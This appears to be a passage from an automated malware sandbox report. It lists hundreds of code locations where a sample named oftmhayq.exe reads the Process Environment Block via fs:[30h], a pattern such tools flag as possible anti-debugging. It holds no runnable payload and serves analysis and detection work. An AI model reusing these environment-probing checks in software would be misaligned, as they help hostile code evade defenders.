          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013078A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3880 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E28FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0136B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D70C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013918CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D78D6 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B0C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01366365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D7B70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EF370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A9BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8BB6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391BA8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4B94 mov edi, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1BE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013053C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4A20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EBA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0131927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01364257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391A5F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D1AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013012BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139129A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3ACA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8ADD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D12D4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0135A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01393518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137CD04 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h]
